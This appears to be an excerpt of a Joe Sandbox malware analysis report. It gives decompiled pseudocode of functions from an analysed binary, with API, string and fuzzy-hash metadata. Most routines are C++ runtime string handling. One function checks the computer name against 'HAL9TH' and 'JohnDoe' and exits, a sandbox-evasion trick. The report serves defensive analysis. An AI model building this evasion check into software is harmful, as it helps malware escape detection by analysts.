                                                                                				if(_t13 < _t25) {
                                                                                					_t13 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t31 = _t13 - _t25;
                                                                                				if(_a12 < _t31) {
                                                                                					_t31 = _a12;
                                                                                				}
                                                                                				if(_t34 != _t23) {
                                                                                					if(E00403CAC(_t23, _t34, _t31, _t35, _t31, 0) != 0) {
                                                                                						if( *((intOrPtr*)(_t23 + 0x14)) < 0x10) {
                                                                                							_t17 = _t23;
                                                                                						} else {
                                                                                							_t17 =  *_t23;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
                                                                                							_t27 = _t34;
                                                                                						} else {
                                                                                							_t27 =  *_t34;
                                                                                						}
                                                                                						E00421230(_t27, _t17 + _a8, _t31);
                                                                                						 *((intOrPtr*)(_t34 + 0x10)) = _t31;
                                                                                						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
                                                                                							_t20 = _t34;
                                                                                						} else {
                                                                                							_t20 =  *_t34;
                                                                                						}
                                                                                						 *((char*)(_t20 + _t31)) = 0;
                                                                                					}
                                                                                				} else {
                                                                                					E00403EAE(_t34, _t31 + _t25, 0xffffffff);
                                                                                					E00403EAE(_t34, 0, _a8);
                                                                                				}
                                                                                				return _t34;
                                                                                			}
















                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403C2D
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                  • Part of subcall function 00403CAC: std::_Xinvalid_argument.LIBCPMT ref: 00403CBB
                                                                                • _memmove.LIBCMT ref: 00403C88
                                                                                Strings
                                                                                • invalid string position, xrefs: 00403C28
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position
                                                                                • API String ID: 3404309857-1799206989
                                                                                • Opcode ID: adb276e73de40375f5a6c3a08118ec9c82dec2784e741eef39d7458d410bfbf7
                                                                                • Instruction ID: 11111a018ed27134238f4363f4a5fcdb6e407d3f4073d5ef00e807834f5dc106
                                                                                • Opcode Fuzzy Hash: adb276e73de40375f5a6c3a08118ec9c82dec2784e741eef39d7458d410bfbf7
                                                                                • Instruction Fuzzy Hash: 1E1104333086109BEB249E09C844A5ABBADEB81716B10093FF812F72C1C778DB41879E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E48F(intOrPtr* __eax, void* __ecx, signed int __edx, void* __ebp, void* __eflags, intOrPtr _a4) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t17;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr* _t24;
                                                                                				intOrPtr* _t25;
                                                                                				void* _t31;
                                                                                				intOrPtr _t32;
                                                                                				signed int _t37;
                                                                                				intOrPtr* _t40;
                                                                                				signed int _t42;
                                                                                
                                                                                				_t37 = __edx;
                                                                                				_t31 = __ecx;
                                                                                				_t28 = "\\";
                                                                                				_t40 = __eax;
                                                                                				if(E00403E2A(__eax, "\\") == 0) {
                                                                                					_t17 =  *(_t40 + 0x10);
                                                                                					_t32 = _a4;
                                                                                					if((_t37 | 0xffffffff) - _t17 <= _t32) {
                                                                                						_t17 = E0041D3B9("string too long");
                                                                                					}
                                                                                					if(_t32 != 0) {
                                                                                						_t42 = _t17 + _t32;
                                                                                						if(E00403AFB(_t28, _t40, _t42) != 0) {
                                                                                							if( *((intOrPtr*)(_t40 + 0x14)) < 8) {
                                                                                								_t21 = _t40;
                                                                                							} else {
                                                                                								_t21 =  *_t40;
                                                                                							}
                                                                                							E00421230(_t21 +  *(_t40 + 0x10) * 2, _t28, _a4 + _a4);
                                                                                							 *(_t40 + 0x10) = _t42;
                                                                                							if( *((intOrPtr*)(_t40 + 0x14)) < 8) {
                                                                                								_t24 = _t40;
                                                                                							} else {
                                                                                								_t24 =  *_t40;
                                                                                							}
                                                                                							 *((short*)(_t24 + _t42 * 2)) = 0;
                                                                                						}
                                                                                					}
                                                                                					return _t40;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t40 + 0x14)) < 8) {
                                                                                					_t25 = _t40;
                                                                                				} else {
                                                                                					_t25 =  *_t40;
                                                                                				}
                                                                                				return E0040E3F4(_a4, _t31, _t40, _t40, _t28 - _t25 >> 1);
                                                                                			}
















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 256744135-2556327735
                                                                                • Opcode ID: 4841f8916a000331bc09baffaf21fde5c2963440be9b2ab0ac0d3499f219faed
                                                                                • Instruction ID: d63f833a7f7cdb249f7bf1187001ff2bf229015282837ddaacb18bade9a6afb9
                                                                                • Opcode Fuzzy Hash: 4841f8916a000331bc09baffaf21fde5c2963440be9b2ab0ac0d3499f219faed
                                                                                • Instruction Fuzzy Hash: 96118270700201ABCA14DF6EDD8482AB3A9BFD5369304493FF411E7291DB38E975D6AE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040383D(intOrPtr* __eax, intOrPtr* __edi, signed int _a4, intOrPtr _a8) {
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t17;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr* _t24;
                                                                                				intOrPtr* _t29;
                                                                                				void* _t30;
                                                                                				intOrPtr* _t31;
                                                                                				intOrPtr* _t36;
                                                                                				intOrPtr _t38;
                                                                                				intOrPtr _t39;
                                                                                
                                                                                				_t36 = __edi;
                                                                                				_t29 = __eax;
                                                                                				_t17 = _a4;
                                                                                				_t38 =  *((intOrPtr*)(__eax + 0x10));
                                                                                				if(_t38 < _t17) {
                                                                                					_t17 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t39 = _t38 - _t17;
                                                                                				if(_a8 < _t39) {
                                                                                					_t39 = _a8;
                                                                                				}
                                                                                				if(_t36 != _t29) {
                                                                                					if(E00403AFB(_t29, _t36, _t39) != 0) {
                                                                                						if( *((intOrPtr*)(_t29 + 0x14)) < 8) {
                                                                                							_t21 = _t29;
                                                                                						} else {
                                                                                							_t21 =  *_t29;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
                                                                                							_t31 = _t36;
                                                                                						} else {
                                                                                							_t31 =  *_t36;
                                                                                						}
                                                                                						_t30 = _t39 + _t39;
                                                                                						E00421230(_t31, _t21 + _a4 * 2, _t30);
                                                                                						 *((intOrPtr*)(_t36 + 0x10)) = _t39;
                                                                                						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
                                                                                							_t24 = _t36;
                                                                                						} else {
                                                                                							_t24 =  *_t36;
                                                                                						}
                                                                                						 *((short*)(_t30 + _t24)) = 0;
                                                                                					}
                                                                                				} else {
                                                                                					E00403A8A(_t17 | 0xffffffff, _t39 + _t17, _t36);
                                                                                					E00403A8A(_a4, 0, _t36);
                                                                                				}
                                                                                				return _t36;
                                                                                			}
















                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403853
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                  • Part of subcall function 00403AFB: std::_Xinvalid_argument.LIBCPMT ref: 00403B08
                                                                                • _memmove.LIBCMT ref: 004038AE
                                                                                Strings
                                                                                • invalid string position, xrefs: 0040384E
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                • String ID: invalid string position
                                                                                • API String ID: 3404309857-1799206989
                                                                                • Opcode ID: ab4252aab716a49de741ed798c7a0fdc2ff0f38ea8bb8a44f00ab793ee04ca37
                                                                                • Instruction ID: e4caaf74bf71e2e5c52c448cadf7bb6a42956e4f7b28af81d8734420a35d8e1d
                                                                                • Opcode Fuzzy Hash: ab4252aab716a49de741ed798c7a0fdc2ff0f38ea8bb8a44f00ab793ee04ca37
                                                                                • Instruction Fuzzy Hash: 9B11B632B14510DBCB10FF19C4804697BEDBF5531630489BBF802AB2C1D738EA59CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040D1DF(signed int __eax, void* __ebx, void* __ebp, void* __eflags, intOrPtr _a4) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr* _t16;
                                                                                				intOrPtr* _t18;
                                                                                				intOrPtr* _t19;
                                                                                				void* _t22;
                                                                                				signed int _t23;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr* _t32;
                                                                                				void* _t33;
                                                                                
                                                                                				_t33 = __ebp;
                                                                                				_t22 = __ebx;
                                                                                				_t29 = _a4;
                                                                                				_t32 = __eax;
                                                                                				_t23 = __eax;
                                                                                				if(E00403D0E(__eax, _a4) == 0) {
                                                                                					_t13 =  *((intOrPtr*)(_t32 + 0x10));
                                                                                					if((_t23 | 0xffffffff) - _t13 <= __ebx) {
                                                                                						_t13 = E0041D3B9("string too long");
                                                                                					}
                                                                                					if(_t22 != 0) {
                                                                                						_t30 = _t13 + _t22;
                                                                                						if(E00403CAC(_t22, _t32, _t30, _t33, _t30, 0) != 0) {
                                                                                							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
                                                                                								_t16 = _t32;
                                                                                							} else {
                                                                                								_t16 =  *_t32;
                                                                                							}
                                                                                							E00421230( *((intOrPtr*)(_t32 + 0x10)) + _t16, _a4, _t22);
                                                                                							 *((intOrPtr*)(_t32 + 0x10)) = _t30;
                                                                                							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
                                                                                								_t18 = _t32;
                                                                                							} else {
                                                                                								_t18 =  *_t32;
                                                                                							}
                                                                                							 *((char*)(_t18 + _t30)) = 0;
                                                                                						}
                                                                                					}
                                                                                					return _t32;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
                                                                                					_t19 = _t32;
                                                                                				} else {
                                                                                					_t19 =  *_t32;
                                                                                				}
                                                                                				return E0040D270(_t22, _t23, _t32, _t32, _t29 - _t19);
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Xinvalid_argument_memmovestd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 256744135-2556327735
                                                                                • Opcode ID: 4029cfd549f4354e7c9b7dd7b702f89fb4be9c386876f7f7706eea7d7ae77d39
                                                                                • Instruction ID: 2ed2454a1e5dc419a3f4eed0d756660298f0f3eb08462334a109b967aca17dbe
                                                                                • Opcode Fuzzy Hash: 4029cfd549f4354e7c9b7dd7b702f89fb4be9c386876f7f7706eea7d7ae77d39
                                                                                • Instruction Fuzzy Hash: 0D117731B047109BD6349EAD9D40A26B7E5EF41B04B10097FB452A72C1C778DD4D869D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E0040C372(void* __edx, intOrPtr __edi, void* __eflags) {
                                                                                				signed int _v8;
                                                                                				char _v36;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				signed int _t9;
                                                                                				intOrPtr* _t11;
                                                                                				signed int _t12;
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr* _t15;
                                                                                				signed int _t16;
                                                                                				signed int _t32;
                                                                                
                                                                                				_t30 = __edi;
                                                                                				_t9 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t9 ^ _t32;
                                                                                				_t31 =  &_v36;
                                                                                				_t11 = E00415A2E(__edx, __edi,  &_v36);
                                                                                				if( *((intOrPtr*)(_t11 + 0x14)) >= 0x10) {
                                                                                					_t11 =  *_t11;
                                                                                				}
                                                                                				_t29 = _t11;
                                                                                				_t12 = E00417230("HAL9TH", _t11);
                                                                                				asm("sbb bl, bl");
                                                                                				_t13 = E00402C34( &_v36, 1, 0);
                                                                                				_t19 =  ~_t12 + 1;
                                                                                				_t35 =  ~_t12 + 1;
                                                                                				if( ~_t12 + 1 != 0) {
                                                                                					_t31 =  &_v36;
                                                                                					_t15 = E00415BB2(_t19, _t30,  &_v36, _t35);
                                                                                					if( *((intOrPtr*)(_t15 + 0x14)) >= 0x10) {
                                                                                						_t15 =  *_t15;
                                                                                					}
                                                                                					_t29 = _t15;
                                                                                					_t16 = E00417230("JohnDoe", _t15);
                                                                                					asm("sbb bl, bl");
                                                                                					_t13 = E00402C34( &_v36, 1, 0);
                                                                                					_t19 =  ~_t16 + 1;
                                                                                					if( ~_t16 + 1 != 0) {
                                                                                						ExitProcess(0);
                                                                                					}
                                                                                				}
                                                                                				return E0041DEB4(_t13, _t19, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 00415A2E: GetComputerNameA.KERNEL32 ref: 00415A62
                                                                                • ExitProcess.KERNEL32 ref: 0040C3EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ComputerExitNameProcess
                                                                                • String ID: HAL9TH$JohnDoe
                                                                                • API String ID: 359086898-3469431008
                                                                                • Opcode ID: e6099f0a6a5f796692b82720c7cc07f1e827716d959402145798add63c7a2ffd
                                                                                • Instruction ID: 1fabda566b0308a9f7d451591b5347009765d607b777055cc12e3ad6f40b20a7
                                                                                • Opcode Fuzzy Hash: e6099f0a6a5f796692b82720c7cc07f1e827716d959402145798add63c7a2ffd
                                                                                • Instruction Fuzzy Hash: CD01B5307512089FEB18EBB58D867ED7371EB49304F40046AEA027B2E2DA7C9D46C79D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00403EAE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				intOrPtr _t9;
                                                                                				intOrPtr _t10;
                                                                                				intOrPtr _t15;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr _t22;
                                                                                				intOrPtr* _t23;
                                                                                				intOrPtr* _t26;
                                                                                				intOrPtr* _t30;
                                                                                
                                                                                				_t30 = __ecx;
                                                                                				_t9 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                				_t20 = _a4;
                                                                                				if(_t9 < _t20) {
                                                                                					_t9 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t17 = _a8;
                                                                                				_t10 = _t9 - _t20;
                                                                                				if(_t10 < _t17) {
                                                                                					_t17 = _t10;
                                                                                				}
                                                                                				if(_t17 != 0) {
                                                                                					_t22 =  *((intOrPtr*)(_t30 + 0x14));
                                                                                					if(_t22 < 0x10) {
                                                                                						_t26 = _t30;
                                                                                					} else {
                                                                                						_t26 =  *_t30;
                                                                                					}
                                                                                					if(_t22 < 0x10) {
                                                                                						_t23 = _t30;
                                                                                					} else {
                                                                                						_t23 =  *_t30;
                                                                                					}
                                                                                					E0041E250(_t23 + _t20, _t26 + _t20 + _t17, _t10 - _t17);
                                                                                					_t15 =  *((intOrPtr*)(_t30 + 0x10)) - _t17;
                                                                                					 *((intOrPtr*)(_t30 + 0x10)) = _t15;
                                                                                					if( *((intOrPtr*)(_t30 + 0x14)) < 0x10) {
                                                                                						_t21 = _t30;
                                                                                					} else {
                                                                                						_t21 =  *_t30;
                                                                                					}
                                                                                					 *((char*)(_t21 + _t15)) = 0;
                                                                                				}
                                                                                				return _t30;
                                                                                			}

                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403EC1
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • _memmove.LIBCMT ref: 00403EFC
                                                                                Strings
                                                                                • invalid string position, xrefs: 00403EBC
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                • String ID: invalid string position
                                                                                • API String ID: 1785806476-1799206989
                                                                                • Opcode ID: af80e2120ba5968590871f54cc49d26c9df6d40808f1997a7dced45c2216f617
                                                                                • Instruction ID: c418a75ba16cb48df8d192100aed17eada65e50fdb217f800e17a2e5bf082662
                                                                                • Opcode Fuzzy Hash: af80e2120ba5968590871f54cc49d26c9df6d40808f1997a7dced45c2216f617
                                                                                • Instruction Fuzzy Hash: AF01B5317042518BC324DE6CD98081BBBBAEBC57027204E3EE082D7681D779ED86C7D9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00403A8A(void* __eax, signed int __ecx, intOrPtr* __esi) {
                                                                                				intOrPtr _t14;
                                                                                				void* _t15;
                                                                                				signed int _t24;
                                                                                				intOrPtr* _t26;
                                                                                				signed int _t28;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr* _t31;
                                                                                				void* _t33;
                                                                                				intOrPtr* _t34;
                                                                                
                                                                                				_t34 = __esi;
                                                                                				_t28 = __ecx;
                                                                                				_t33 = __eax;
                                                                                				_t14 =  *((intOrPtr*)(__esi + 0x10));
                                                                                				if(_t14 < __ecx) {
                                                                                					_t14 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t15 = _t14 - _t28;
                                                                                				if(_t15 < _t33) {
                                                                                					_t33 = _t15;
                                                                                				}
                                                                                				if(_t33 != 0) {
                                                                                					_t30 =  *((intOrPtr*)(_t34 + 0x14));
                                                                                					if(_t30 < 8) {
                                                                                						_t26 = _t34;
                                                                                					} else {
                                                                                						_t26 =  *_t34;
                                                                                					}
                                                                                					if(_t30 < 8) {
                                                                                						_t31 = _t34;
                                                                                					} else {
                                                                                						_t31 =  *_t34;
                                                                                					}
                                                                                					E0041E250(_t31 + _t28 * 2, _t26 + (_t28 + _t33) * 2, _t15 - _t33 + _t15 - _t33);
                                                                                					_t24 =  *(_t34 + 0x10) - _t33;
                                                                                					 *(_t34 + 0x10) = _t24;
                                                                                					if( *((intOrPtr*)(_t34 + 0x14)) < 8) {
                                                                                						_t29 = _t34;
                                                                                					} else {
                                                                                						_t29 =  *_t34;
                                                                                					}
                                                                                					 *((short*)(_t29 + _t24 * 2)) = 0;
                                                                                				}
                                                                                				return _t34;
                                                                                			}














                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403A99
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D41B
                                                                                  • Part of subcall function 0041D406: __CxxThrowException@8.LIBCMT ref: 0041D430
                                                                                  • Part of subcall function 0041D406: std::exception::exception.LIBCMT ref: 0041D441
                                                                                • _memmove.LIBCMT ref: 00403AD4
                                                                                Strings
                                                                                • invalid string position, xrefs: 00403A94
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                • String ID: invalid string position
                                                                                • API String ID: 1785806476-1799206989
                                                                                • Opcode ID: 5f8fd1b6db95633989606435382b13d3034b5e80018b3eaa665933ffd38d205f
                                                                                • Instruction ID: 720684423c2553102bf9fbebe1beda0a40ebbc2d731b1dc030533118bb8b0cfd
                                                                                • Opcode Fuzzy Hash: 5f8fd1b6db95633989606435382b13d3034b5e80018b3eaa665933ffd38d205f
                                                                                • Instruction Fuzzy Hash: C90171313106018BC720CE6DDA9485AB7AEAFC4706324093FD0C2D7A85E739DA468B98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 23%
                                                                                			E0040F37F(char* _a4) {
                                                                                				intOrPtr _v8;
                                                                                				intOrPtr _v12;
                                                                                				char _v24;
                                                                                				char* _t17;
                                                                                				signed char _t19;
                                                                                				char* _t26;
                                                                                				intOrPtr _t28;
                                                                                
                                                                                				_t17 = 0;
                                                                                				if(_a4 == 0) {
                                                                                					L3:
                                                                                					_t19 =  *(_t26 + 0x10) &  *(_t26 + 0xc);
                                                                                					if((_t19 & 0x00000004) == 0) {
                                                                                						if((_t19 & 0x00000002) == 0) {
                                                                                							_t28 = E0041D681();
                                                                                							_a4 = "ios_base::eofbit set";
                                                                                						} else {
                                                                                							_t28 = E0041D681();
                                                                                							_a4 = "ios_base::failbit set";
                                                                                						}
                                                                                					} else {
                                                                                						_t28 = E0041D681();
                                                                                						_a4 = "ios_base::badbit set";
                                                                                					}
                                                                                					_t8 =  &_v24; // 0x442450
                                                                                					_t26 = _t8;
                                                                                					E0041E15E(_t26,  &_a4);
                                                                                					_v12 = 1;
                                                                                					_v8 = _t28;
                                                                                					_v24 = 0x442450;
                                                                                					_push(0x444274);
                                                                                					_t12 =  &_v24; // 0x442450
                                                                                					_t17 = _t12;
                                                                                					goto L2;
                                                                                				} else {
                                                                                					_push(0);
                                                                                					L2:
                                                                                					_push(_t17);
                                                                                					E00421126();
                                                                                					goto L3;
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                • __CxxThrowException@8.LIBCMT ref: 0040F390
                                                                                • std::exception::exception.LIBCMT ref: 0040F3B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throwstd::exception::exception
                                                                                • String ID: P$D
                                                                                • API String ID: 3728558374-329552781
                                                                                • Opcode ID: 07db952bb3cb9e1d33ff292a20637aa54269c0dc372f6a05b6cfd29461628bbf
                                                                                • Instruction ID: 8b36795022dd307ea32d0961d62ad3ba83685b3f6d8194d547ff1d516d34f0e2
                                                                                • Opcode Fuzzy Hash: 07db952bb3cb9e1d33ff292a20637aa54269c0dc372f6a05b6cfd29461628bbf
                                                                                • Instruction Fuzzy Hash: B70167B1800304EADB10DF65C5465EA7BB4AE04398725807BAC09AB651D77CDA8B87DA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E004235A5(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr* _t28;
                                                                                				void* _t29;
                                                                                
                                                                                				_t28 = __esi;
                                                                                				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                                				E004218C3(__ebx, __edx, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                                                                				 *((intOrPtr*)(E00427B66(__edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                                				_t17 = E00427B66(__edx, __edi, __eflags);
                                                                                				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                                				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                                                					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                                					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                                						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                                                                							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                                                                							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                                                								_t17 = E0042189C(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                                                                								_t38 = _t17;
                                                                                								if(_t17 != 0) {
                                                                                									_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                									_push(_t28);
                                                                                									return E0042332C(_t38);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t17;
                                                                                			}







                                                                                APIs
                                                                                  • Part of subcall function 004218C3: __getptd.LIBCMT ref: 004218C9
                                                                                  • Part of subcall function 004218C3: __getptd.LIBCMT ref: 004218D9
                                                                                • __getptd.LIBCMT ref: 004235B4
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __getptd.LIBCMT ref: 004235C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
